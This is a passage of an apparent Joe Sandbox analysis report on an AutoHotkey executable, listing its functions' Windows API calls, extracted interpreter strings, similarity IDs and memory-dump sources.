                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00471500: GetWindowLongW.USER32(00000000,000000F0), ref: 00471540
                                        • Part of subcall function 00471500: GetWindowLongW.USER32(00000000,000000F0), ref: 0047156E
                                      • GetParent.USER32 ref: 004735E7
                                      • CheckRadioButton.USER32(00000000,000003FD,?,-00000004), ref: 00473602
                                      • SendMessageW.USER32(00000400,000000F1,00000000,00000000), ref: 0047364A
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00473657
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00473666
                                      Similarity
                                      • API ID: LongWindow$ButtonCheckMessageParentRadioSend
                                      • String ID:
                                      • API String ID: 3848393323-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _malloc.LIBCMT ref: 0040E43E
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • _malloc.LIBCMT ref: 0040E463
                                      • _free.LIBCMT ref: 0040E472
                                      Similarity
                                      • API ID: _malloc$AllocateHeap_free
                                      • String ID:
                                      • API String ID: 1159278337-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _malloc.LIBCMT ref: 0049A1D5
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • _free.LIBCMT ref: 0049A1E8
                                      Similarity
                                      • API ID: AllocateHeap_free_malloc
                                      • String ID:
                                      • API String ID: 1020059152-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00468001
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004684F1
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00468504
                                      • SendMessageW.USER32(00000000,00001330,-00000001,00000000), ref: 0046851D
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046852C
                                        • Part of subcall function 00473F30: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00473F47
                                      Similarity
                                      • API ID: MessageSend$LongWindow_free
                                      • String ID:
                                      • API String ID: 3510866790-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageTimeoutW.USER32(00000000,00000010,00000000,00000000,00000002,000001F4,?), ref: 0045F4A9
                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 0045F4BD
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0045F4D3
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0045F4E2
                                      • CloseHandle.KERNEL32(00000000), ref: 0045F4E9
                                      Similarity
                                      • API ID: Process$CloseHandleMessageOpenSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 1181120299-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008), ref: 0045C346
                                      • LockServiceDatabase.ADVAPI32(00000000), ref: 0045C353
                                      • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0045C35E
                                      • GetLastError.KERNEL32 ref: 0045C366
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0045C379
                                      Similarity
                                      • API ID: Service$Database$CloseErrorHandleLastLockManagerOpenUnlock
                                      • String ID:
                                      • API String ID: 2828566434-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _wcsncpy.LIBCMT ref: 004576BA
                                      • GetTickCount.KERNEL32 ref: 004579B7
                                        • Part of subcall function 00401060: IsClipboardFormatAvailable.USER32(0000000D), ref: 00401072
                                        • Part of subcall function 00401060: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040107A
                                      Strings
                                      Similarity
                                      • API ID: AvailableClipboardFormat$CountTick_wcsncpy
                                      • String ID: 6Dd
                                      • API String ID: 4241739539-23949168
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00437455
                                        • Part of subcall function 0049A18D: RtlFreeHeap.NTDLL(00000000,00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1A3
                                        • Part of subcall function 0049A18D: GetLastError.KERNEL32(00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1B5
                                      • _free.LIBCMT ref: 00437513
                                      Strings
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID: Next
                                      • API String ID: 776569668-2753412866
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: CountTick
                                      • String ID: #Bd
                                      • API String ID: 536389180-1306175853
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0047FFB0: _vswprintf_s.LIBCMT ref: 0047FFC9
                                      • GetTickCount.KERNEL32 ref: 004394F1
                                      Strings
                                      • ---- %s, xrefs: 0043952C
                                      • Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after , xrefs: 0043940B
                                      • Press [F5] to refresh., xrefs: 004395D2
                                      Similarity
                                      • API ID: CountTick_vswprintf_s
                                      • String ID: Press [F5] to refresh.$---- %s$Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after
                                      • API String ID: 1349412622-1384135373
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 0040A029
                                      • GetTickCount.KERNEL32 ref: 0040A042
                                      Strings
                                      Similarity
                                      • API ID: CallCountHookNextTick
                                      • String ID: #Bd
                                      • API String ID: 3618830134-1306175853
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: +-^RASHNOT$Parameter #1 invalid.$Parameter #3 invalid.
                                      • API String ID: 2691759472-20153427
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00453292
                                        • Part of subcall function 0049A18D: RtlFreeHeap.NTDLL(00000000,00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1A3
                                        • Part of subcall function 0049A18D: GetLastError.KERNEL32(00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1B5
                                      Strings
                                      Similarity
                                      • API ID: ErrorFreeHeapLast_free
                                      • String ID: Count$array$object
                                      • API String ID: 1353095263-899595868
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 0047D3B1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000400,004045A4,00000000,00000000,00000000,00000001,00000000,00000001,?,00000000,00000001,?,004045A4), ref: 0047D3EC
                                      • WideCharToMultiByte.KERNEL32(00000000,00000400,00000000,?,00000000,00000000,00000001,00000000,00000000,004D6D18,?,00000000,00000001,?,004045A4), ref: 0047D426
                                      Strings
                                      Similarity
                                      • API ID: ByteCharMultiWide$_free
                                      • String ID: ?
                                      • API String ID: 4292660327-1684325040
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _malloc.LIBCMT ref: 0043F200
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • _free.LIBCMT ref: 0043F237
                                      • _malloc.LIBCMT ref: 0043F245
                                      Strings
                                      Similarity
                                      • API ID: _malloc$AllocateHeap_free
                                      • String ID: Out of memory.
                                      • API String ID: 1159278337-4087320997
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: Get$Set
                                      • API String ID: 0-1189334568
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 0047D0BA
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,?,?,?,0040553C,?,000000FF,?,004079E9,?), ref: 0047D0EE
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,y@,00000000,00000000,?,00000000,?,0040553C,?,000000FF,?,004079E9,?,?), ref: 0047D112
                                      Strings
                                      Similarity
                                      • API ID: ByteCharMultiWide$_free
                                      • String ID: y@
                                      • API String ID: 4292660327-1812993971
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00450229
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00450239
                                      • __swprintf.LIBCMT ref: 0045026D
                                      Strings
                                      • %04d%02d%02d%02d%02d%02d, xrefs: 00450267
                                      Similarity
                                      • API ID: Time$File$LocalSystem__swprintf
                                      • String ID: %04d%02d%02d%02d%02d%02d
                                      • API String ID: 3390705568-4847443
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _malloc.LIBCMT ref: 004816A0
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • SendMessageW.USER32(?,00000438,?,00000030), ref: 004816CB
                                      • _free.LIBCMT ref: 00481716
                                      Strings
                                      Similarity
                                      • API ID: AllocateHeapMessageSend_free_malloc
                                      • String ID: 0
                                      • API String ID: 1568525244-4108050209
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcstoi64_memmove
                                      • String ID: file://$file:///
                                      • API String ID: 3802750240-3202756431
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004054CE: __EH_prolog.LIBCMT ref: 004054D3
                                      • _sprintf.LIBCMT ref: 0040931C
                                      Strings
                                      Similarity
                                      • API ID: H_prolog_sprintf
                                      • String ID: %%%02X$-_.!~*()/$file:///
                                      • API String ID: 1907722333-736925546
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsnicmp_wcschr
                                      • String ID: <>=/|^,:*&~!()[]{}+-?."'\;`$Class
                                      • API String ID: 2237432580-400929710
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Default$PSK$XSK
                                      • API String ID: 3832890014-2912753211
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • %04d%02d%02d%02d%02d%02d, xrefs: 0044F2AB
                                      Similarity
                                      • API ID: SystemTime__swprintf
                                      • String ID: %04d%02d%02d%02d%02d%02d
                                      • API String ID: 3074119229-4847443
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: IconNotifyShell__memset_wcsncpy
                                      • String ID: AutoHotkey
                                      • API String ID: 1481257660-348589305
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryW.KERNEL32(dwmapi.dll,DwmGetWindowAttribute,?,004845D4,00000000,?,?,?,?,0040F2F8,004D8348,?,?,004B0CF8,004B0CF8,00000000), ref: 0048530B
                                      • GetProcAddress.KERNEL32(00000000), ref: 00485312
                                      Strings
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: DwmGetWindowAttribute$dwmapi.dll
                                      • API String ID: 2574300362-1753671286
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetMenuItemInfoW.USER32 ref: 004778A3
                                      • DeleteObject.GDI32(00000000), ref: 004778B6
                                      • DestroyIcon.USER32(00000000), ref: 004778D0
                                      Strings
                                      Similarity
                                      • API ID: DeleteDestroyIconInfoItemMenuObject
                                      • String ID: 0
                                      • API String ID: 2083505926-4108050209
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __wcsicoll.LIBCMT ref: 0043668C
                                      • __wcsicoll.LIBCMT ref: 0043669E
                                        • Part of subcall function 0041A3C0: __wcstoi64.LIBCMT ref: 0041A3D3
                                      • lstrcmpiW.KERNEL32(004B0CF8,004B0CF8), ref: 004366B7
                                      • lstrcmpiW.KERNEL32(004B0CF8,004B0CF8), ref: 004366C4
                                      Similarity
                                      • API ID: __wcsicolllstrcmpi$__wcstoi64
                                      • String ID:
                                      • API String ID: 455558549-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0041A3C0: __wcstoi64.LIBCMT ref: 0041A3D3
                                      • __wcsicoll.LIBCMT ref: 00436265
                                      • __wcsicoll.LIBCMT ref: 00436279
                                      • lstrcmpiW.KERNEL32(00000000,004B0CF8,00000000), ref: 004362B4
                                      Similarity
                                      • API ID: __wcsicoll$__wcstoi64lstrcmpi
                                      • String ID:
                                      • API String ID: 3113806400-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID: Failed to open file.$FileOpen$Parameter #2 invalid.
                                      • API String ID: 1452528299-3221046509
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,0040F2F8,004D8348,?,?,004B0CF8,004B0CF8,00000000), ref: 004844F7
                                      • IsWindowVisible.USER32(00000000), ref: 00484513
                                      • GetForegroundWindow.USER32(?,?,?,?,0040F2F8,004D8348,?,?,004B0CF8,004B0CF8,00000000), ref: 00484553
                                      • IsWindowVisible.USER32(00000000), ref: 004845C0
                                        • Part of subcall function 004852F0: LoadLibraryW.KERNEL32(dwmapi.dll,DwmGetWindowAttribute,?,004845D4,00000000,?,?,?,?,0040F2F8,004D8348,?,?,004B0CF8,004B0CF8,00000000), ref: 0048530B
                                        • Part of subcall function 004852F0: GetProcAddress.KERNEL32(00000000), ref: 00485312
                                      Similarity
                                      • API ID: Window$ForegroundVisible$AddressLibraryLoadProc
                                      • String ID:
                                      • API String ID: 559202094-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: __wcstoi64
                                      • String ID:
                                      • API String ID: 398114495-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00008000,?,?), ref: 0047C489
                                        • Part of subcall function 0047C320: FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0047C36C
                                        • Part of subcall function 0047C320: FindClose.KERNEL32(00000000,?,?), ref: 0047C378
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0047C4B6
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0047C509
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0047C51E
                                      Similarity
                                      • API ID: PrivateProfileWrite$FindString$CloseFileFirstFullNamePathSection
                                      • String ID:
                                      • API String ID: 1032437609-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageTimeoutW.USER32(?,000000B0,?,?,00000002,000007D0,?), ref: 0045D884
                                      • SendMessageTimeoutW.USER32(?,000000C9,?,00000000,00000002,000007D0,?), ref: 0045D8A5
                                      • SendMessageTimeoutW.USER32(?,000000C9,?,00000000,00000002,000007D0,00000000), ref: 0045D8D2
                                      • SendMessageTimeoutW.USER32(?,000000C9,?,00000000,00000002,000007D0,00000000), ref: 0045D903
                                      Similarity
                                      • API ID: MessageSendTimeout
                                      • String ID:
                                      • API String ID: 1599653421-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004A5648
                                      • __isleadbyte_l.LIBCMT ref: 004A567B
                                      • MultiByteToWideChar.KERNEL32(54896610,00000009,?,00009B8D,00000000,00000000,?,?,?,0047FFCE,?,00000000), ref: 004A56AC
                                      • MultiByteToWideChar.KERNEL32(54896610,00000009,?,00000001,00000000,00000000,?,?,?,0047FFCE,?,00000000), ref: 004A571A
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • IsMenu.USER32(00000000), ref: 00477344
                                      • GetMenu.USER32(?), ref: 00477370
                                      • DestroyMenu.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,00477448), ref: 00477384
                                      Similarity
                                      • API ID: Menu$Destroy
                                      • String ID:
                                      • API String ID: 3525833831-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Similarity
                                      • API ID: __wcsnicmp_wcstoul
                                      • String ID:
                                      • API String ID: 372159744-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __getptd_noexit
                                      • String ID:
                                      • API String ID: 3074181302-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00468001
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00468410
                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 0046842D
                                      • ShowWindow.USER32(00000000,-00000001), ref: 00468455
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Window$LongMessageSendShow_free
                                      • String ID:
                                      • API String ID: 592510501-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: State
                                      • String ID:
                                      • API String ID: 1649606143-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetMenu.USER32(?), ref: 004695FC
                                      • IsWindowVisible.USER32(?), ref: 00469610
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,00000000,02D91808,00477321,00000000), ref: 00469632
                                      • RedrawWindow.USER32(?,00000000,00000000,00000501,?,?,00000000,02D91808,00477321,00000000), ref: 00469649
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Window$MenuRedrawVisible
                                      • String ID:
                                      • API String ID: 1537645765-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000,74DEE0D0,?,00000000,00405259,SetClipboardData), ref: 0040527C
                                      • CloseClipboard.USER32 ref: 00405281
                                      • GlobalUnlock.KERNEL32(00000000,74DEE0D0,?,00000000,00405259,SetClipboardData), ref: 00405295
                                      • GlobalFree.KERNEL32(00000000), ref: 004052A5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Global$Unlock$ClipboardCloseFree
                                      • String ID:
                                      • API String ID: 1156981608-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 004815FA
                                      • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0048160B
                                      • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 00481629
                                      • CloseHandle.KERNEL32 ref: 00481638
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Process$AllocCloseHandleOpenThreadVirtualWindow
                                      • String ID:
                                      • API String ID: 1013503288-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • EnableMenuItem.USER32(00000000,0000FF81,00000003), ref: 0041E4EE
                                      • EnableMenuItem.USER32(00000000,0000FF7E,00000003), ref: 0041E4F7
                                      • EnableMenuItem.USER32(00000000,0000FF7F,00000003), ref: 0041E500
                                      • EnableMenuItem.USER32(00000000,0000FF80,00000003), ref: 0041E509
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: EnableItemMenu
                                      • String ID:
                                      • API String ID: 1841910628-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00413664
                                        • Part of subcall function 0049A18D: RtlFreeHeap.NTDLL(00000000,00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1A3
                                        • Part of subcall function 0049A18D: GetLastError.KERNEL32(00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1B5
                                      • _free.LIBCMT ref: 0041366D
                                      • _free.LIBCMT ref: 00413676
                                      • _free.LIBCMT ref: 00413688
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • SendMessageTimeoutW.USER32(00000000,?,00000000,00000000,00000002,00001388,?), ref: 004418C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Window$ForegroundMessageSendTimeoutVisible
                                      • String ID: FAIL
                                      • API String ID: 578228273-2964506365
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00403C50: GetTickCount.KERNEL32 ref: 00403C82
                                      • GetTickCount.KERNEL32 ref: 0040347D
                                      • _wcsncpy.LIBCMT ref: 004034F3
                                        • Part of subcall function 00401060: IsClipboardFormatAvailable.USER32(0000000D), ref: 00401072
                                        • Part of subcall function 00401060: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040107A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: AvailableClipboardCountFormatTick$_wcsncpy
                                      • String ID: Timer
                                      • API String ID: 1301760726-2870079774
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __swprintf
                                      • String ID: %0.*f
                                      • API String ID: 1857805200-3326200935
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _malloc.LIBCMT ref: 00412703
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      Strings
                                      • Out of memory., xrefs: 00412719
                                      • Hotstring max abbreviation length is 40., xrefs: 004126D5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: AllocateHeap_malloc
                                      • String ID: Hotstring max abbreviation length is 40.$Out of memory.
                                      • API String ID: 501242067-4290233147
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004096D0
                                        • Part of subcall function 004054CE: __EH_prolog.LIBCMT ref: 004054D3
                                      Strings
                                      • <property name="%e" fullname="%e" type="%s" facet="%s" classname="%s" address="%p" size="0" page="%i" pagesize="%i" children="%i" numchildren="%i">, xrefs: 00409757
                                      • <property name="%e" fullname="%e" type="%s" size="0" page="0" pagesize="%i" children="%i" numchildren="%i">, xrefs: 004097FC
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: <property name="%e" fullname="%e" type="%s" facet="%s" classname="%s" address="%p" size="0" page="%i" pagesize="%i" children="%i" numchildren="%i">$<property name="%e" fullname="%e" type="%s" size="0" page="0" pagesize="%i" children="%i" numchildren="%i">
                                      • API String ID: 3519838083-126030962
                                      • Opcode ID: 66d80b8982df5ad9c8c3e30b142b7142b98fc252d4eb4a2c710387da923470ce
                                      • Instruction ID: e0e16285a871e254ec9e8a2accc364f53dfe5d85df6f702ec7122443a9ec0ccd
                                      • Opcode Fuzzy Hash: 66d80b8982df5ad9c8c3e30b142b7142b98fc252d4eb4a2c710387da923470ce
                                      • Instruction Fuzzy Hash: 6141657A610601DFCB28CF15C980E6ABBF6FF88304B14856EE8569B7A2D735EC11CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,00000000,?,?,?,?,?,?,tw@,004079C5), ref: 00407966
                                      Strings
                                      Similarity
                                      • API ID: ByteCharMultiWide
                                      • String ID: %u">$tw@
                                      • API String ID: 626452242-1419491401
                                      • Opcode ID: 37034768986416f79b5d892bebbb98b7221bd8b40e13ee0e1b73b724ea3251f2
                                      • Instruction ID: f2d841f6e42ff71f85d94efde8c8dfb2a10db64d73d94b5e9afccfa1aeb8d0df
                                      • Opcode Fuzzy Hash: 37034768986416f79b5d892bebbb98b7221bd8b40e13ee0e1b73b724ea3251f2
                                      • Instruction Fuzzy Hash: 4E31C872D04105AFEF10AF94C840AAE7769EB44764F548137E910B72C0D378BE41DB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,004B0CF8,00432D3F,?,004B0CF8,?,00000000,00000000), ref: 00484365
